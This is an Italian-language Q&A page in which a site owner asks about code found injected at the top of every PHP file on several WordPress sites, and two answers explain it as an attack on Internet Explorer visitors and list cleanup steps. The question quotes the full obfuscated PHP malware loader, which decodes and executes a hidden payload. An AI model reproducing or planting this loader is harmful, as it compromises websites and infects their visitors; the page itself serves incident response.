Tutti i miei file PHP hanno inserito il codice al loro interno. Cosa faccio ora? [duplicare]

Naviga le tue risposte
-2

Ho 10 siti web sul mio account che utilizzano WordPress e alcuni siti Web personalizzati. Ma tutti i file del mio sito web hanno questo codice all'inizio di ogni file PHP: 

<?php if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $pxcnlrwjvb = '#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvm)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvy33]65]y31]55]y85]82]y76]62]y3:]887fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x78bT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825hc%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%uhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%<3,j%x5c%x7825>j%x5c%x78254-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y60msvd},;uqpuft%x5c%x7;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7PMSVD!-id%x5c%x7825)uqpuft%x5c%x787827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%xbek!~!<b%x5c%x7825%xV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825282#<!%x5c%x7825tjw!>!#]y84]275]y83%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2]y72]265]y39]274]y85]273]y6g25j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-KD#)sfebfI{*w%x5c%x782UPNFS&d_SFSFGFS%x5c%x7860QUUI&x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%xd%x5c%x78256<%x5c%x787fw%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQwTW%x5c%x7825hIr%x5c%x785c1^-%x55c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x782B#-#T#-#E#-#G#-#H#-#I#-#K#37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x75c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmf275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Kx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x782V;3q%x5c%x7825}U;y]}R;2]},;5:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x783]238M7]381]211M5]67]452]88]5]48]3293e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.98Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825}7;!}6;##}C;!>>!}W;utpi}Y;tuofu|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%xopjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!64") && (!isset($GLOBALS["%x615c%x7878Bsfuvso!sboepn)%x5c%x7825epnb!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c25w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x782%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%xopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y5c%x7824<%x5c%x78e%x5c%x75w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Zufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)t7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h25wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#Qe%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%xc*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c1%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!4b!>!%x5c%x7825yy)#}#-#%x5c%x782]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]%x787f%x5c%x787f%x5c%x787f%x5c7860hfsq)!sp!*#ojneb#-*f%x5c%x78K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>odujpo)##-!#~<#%x5c%x9f5d816:+946:ce44#)zbssb!>!00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]36*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w25)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825r%x5c%x785c2^-%x5c%%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x6x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x78%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; functioc%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+25)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c4#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]4id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEB%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!%163%x70%154%x69%164%50%x)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]2777825!<*::::::-111112)eobs%x5c]58]24]31#-%x5c%x7825tdz*Wsfc%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%sv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x522%134%x78%62%x35%165%x]y76]271]y7d]252]y74]256#<!%c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825b824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x55c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7n fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_re>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18Rssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860F60hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5cx5c%x7860LDPT7-UFOJ%x5c%x7860GB)!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j06<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x78825!*##>>X)!gjZ<#opo#>b%x5c%x78257825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubif((function_exists("%x6f%142%x5f%163%x74%141%x72%17825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x58b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x7c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWt5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827ux5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutc5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,x7860QUUI&b%x5c%x7825!|!*)323z5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%xx5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%3f]63]y3:]68]y76#<%x5c%x78%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%xutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{2272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%825!-uyfu%x5c%x7825)3of)fepdof%x5c%x7860place("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6dc%x7825w%x5c%x7860TW~%x6<%x5c%x787fw6*CW&)7gj6<*doj%x5-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825|!*5!%x5c%x7827!hmg%x5c%x7825)825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5vt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824,47R25,d7R17,67R37,#%x5c%x256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fwE{h%x5c%x7825)j{hnpd!opjudovg!|!5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]c_UOFHB%x5c%x7860SFTV%x5c%B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827j]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!56]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]tmf!}Z;^nbsbq%x5c%x78x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%xx5c%x7825%x5c%x7827Y%x5c%x78c%x7825}X;!sp!*#opo#>>}R;72]37y]672]48y]#>s%x5c%x7%x782f%x5c%x7824)#P#-#Q#-#x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozc%x7878;0]=])0#)U!%x5c%x7ss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)ec%x7825,3,j%x5c%x7825>j%7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)7&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x525%x5c%x785cSFWSFT%x5c%x7860%x5%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257e]53Ld]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5t+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%xc%x78257-C)fepmqnjA%x5c%x7825c%x7825)m%x5c%x7825=*h%x5c%xuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*825<#462]47y]252]18y]#>q%x5c%x7825<#762D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]5)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef25s:%x5c%x785c%x5c%x7825j:^<!%x5c%x785c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%xx782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x781#%x5c%x782f#7e:55946-tr.984:75983:48984:71]>!#]y81]273]y76]258]y6g]273x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]2x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825jcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x78785)kV%x5c%x7878{**#k#)8b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>M3]317]445]212]445]43]321]464]284]364]6]234]34257ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!fgj}l;33bq}k;opjudovg}%x5tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}782fq%x5c%x7825>U<#16,47R57,27Rmsv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827i]364]6]283]427]36]373P6]36]73]8860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}/(.*)/epreg_replaceodbdxuijoz'; $zificdtoeq = explode(chr((191-147)),'6002,51,2681,30,4294,68,5324,64,6819,63,4182,55,3563,55,4672,25,4937,23,787,53,6566,26,3435,67,1865,45,3257,59,5762,67,5571,46,487,61,3067,55,6267,52,2961,52,9751,50,8358,61,1083,42,1572,37,63,52,5686,32,2365,57,6719,60,7963,38,9542,70,7496,56,4878,59,4823,55,7824,28,7272,50,4066,42,6905,31,8538,28,8257,70,6223,44,8677,41,4554,51,1041,42,9981,39,1747,24,5910,48,1994,40,264,36,2552,31,3122,54,1771,62,1172,34,840,22,10051,55,4605,67,2639,42,2583,56,5862,48,616,26,5088,65,750,37,1206,56,6053,65,8131,24,6319,48,7151,35,7076,30,2748,69,1441,37,5958,44,7322,32,8890,41,8155,49,430,57,9410,44,8071,60,548,68,712,38,8998,63,5153,68,4766,29,7032,44,5718,44,0,63,8483,55,3793,32,4108,48,4362,47,3972,27,5508,63,1630,30,7415,26,6424,30,1262,20,9143,39,5829,33,8931,67,6779,40,9848,38,7669,21,8327,31,7852,25,1336,70,2856,46,862,50,3316,45,6662,57,115,57,2218,64,8836,54,4409,54,3763,30,2100,57,1282,54,7246,26,9950,31,5453,55,8639,38,1609,21,9675,21,9910,40,2282,27,8204,53,9886,24,8001,25,7756,68,8718,45,4697,69,1478,28,3714,49,1406,35,7552,48,5388,65,5221,63,9223,52,7354,61,1936,58,1697,50,8566,29,3361,40,4505,49,7877,25,8763,39,9182,41,6454,54,3618,64,9383,27,4960,28,7928,35,6508,58,9501,41,2902,59,3682,32,642,70,971,70,6367,57,5284,40,1125,47,5042,46,172,59,3951,21,9061,45,3176,56,7186,60,2502,50,3502,61,6592,70,2711,37,8026,45,4237,57,3401,34,1833,32,4156,26,7690,66,9612,63,7441,55,2457,45,2309,56,9339,44,3825,59,3013,54,1660,37,8802,34,2157,61,8419,64,4988,54,369,61,3999,67,10020,31,2422,35,9801,47,4795,28,8595,44,5617,69,3884,67,9275,64,1506,66,300,69,9106,37,2817,39,2034,66,6972,60,7106,45,6882,23,3232,25,9696,55,7902,26,1910,26,6936,36,6163,60,6118,45,912,59,9454,47,7600,69,231,33,4463,42'); $geaesgccre=substr($pxcnlrwjvb,(34730-24624),(33-26)); if (!function_exists('yuihikjfsn')) { function yuihikjfsn($uxjajytpri, $phxiepyqfi) { $gbuorasllr = NULL; for($hxqvsjayug=0;$hxqvsjayug<(sizeof($uxjajytpri)/2);$hxqvsjayug++) { $gbuorasllr .= substr($phxiepyqfi, $uxjajytpri[($hxqvsjayug*2)],$uxjajytpri[($hxqvsjayug*2)+1]); } return $gbuorasllr; };} $mroodsipsd="\x20\x2a\x792\x622\x715\x643\x612\x20\x2f\x656\x614\x283\x742\x5f2\x650\x6c1\x635\x283\x682\x28\x32\x39\x32\x32\x29\x203\x682\x28\x34\x34\x33\x32\x29\x201\x751\x681\x6b2\x663\x6e\x242\x696\x693\x644\x6f5\x71\x240\x783\x6e4\x727\x6a6\x62\x29\x3b\x2f\x206\x6b3\x742\x740\x684\x6d\x2a\x20"; $kmfixnnsec=substr($pxcnlrwjvb,(44369-34256),(59-47)); $kmfixnnsec($geaesgccre, $mroodsipsd, NULL); $kmfixnnsec=$mroodsipsd; $kmfixnnsec=(477-356); $pxcnlrwjvb=$kmfixnnsec-1; ?>

Cos'è questo e come faccio a sbarazzarmene?

    
posta user3125294 21.11.2015 - 12:02
fonte

2 risposte

3

Questo è un attacco contro i visitatori del tuo sito web. Da un breve sguardo l'attacco è specifico per gli utenti di Internet Explorer ad eccezione della versione 11 (verifica HTTP_USER_AGENT contro string 'msie' ma non 'rv: 11') quindi suppongo che questo invierà qualche codice JavaScript al client che farà cadere alcuni malware nel file system locale ed eseguirlo con l'aiuto di ActiveX.

Che cosa dovresti fare: chiudi il tuo sito in modo che non vengano interessati più visitatori e non ottieni la lista nera da GoogleSafeBrowsing o simili. Quindi trova il vettore di attacco, pulisci il sito e solo dopo esserti assicurato che tutto sia a posto (meglio ottenere aiuto esterno) rimetti il sito online.

Per maggiori informazioni vedi Come faccio a gestire un compromesso server? .

    
risposta data 21.11.2015 - 12:25
fonte
2

Ecco un link alla versione (in qualche modo) decodificata del codice PHP offuscato: link

Per farla funzionare, ti consiglio di esaminare i tuoi file di registro per determinare come sono arrivati e sono stati in grado di modificare i tuoi file.

Una volta che è stato determinato, dovresti in qualche modo (so che questo è vago, forse una volta che hai scoperto qualcosa dal registro puoi fare di nuovo un'altra domanda) cerca di impedirgli di fare cose.

Altre domande che dovresti porci è:

  1. Con quale frequenza aggiorno Wordpress (se non lo è)?
  2. Quali plugin aggiuntivi utilizzo e li aggiorno?
  3. Ho indurito la mia installazione di Wordpress? (Utilizza Google)

Inoltre puoi eseguire un test sui tuoi siti Wordpress usando wpscan. WPScan può essere trovato sul link ed è uno strumento utilizzato dai penetration tester per determinare la sua versione, i plugin usati e le sue versioni, enumerare nomi utente e credenziali di forza bruta .

Sebbene la determinazione di ciò che è stato fatto sia considerata una buona cosa per evitare che ciò accada di nuovo, penso che dovresti considerare i tuoi server compromessi.

Azioni suggerite:

  1. Esamina i file di registro (apache / nginx / mysql / access logs)
  2. Esamina il file system per backdoor, web shell e reverse shell
  3. Cambia password (non solo sul server se le password sono utilizzate anche in altri account).
  4. Esamina i backup (ammesso che tu abbia dei backup) con i file PHP modificati. Assicurati di disporre di un backup che non contenga file modificati.
  5. Scopri e comprendi in che modo hanno compromesso il tuo server.
  6. Reinstallazione del server.
  7. Ripristina backup "buoni"

Buona fortuna!

    
risposta data 21.11.2015 - 12:42
fonte

Leggi altre domande sui tag

Vota la redditività del mio sistema anti-phishing [chiuso] È illegale accedere a un file pubblico che contiene informazioni private? [chiuso]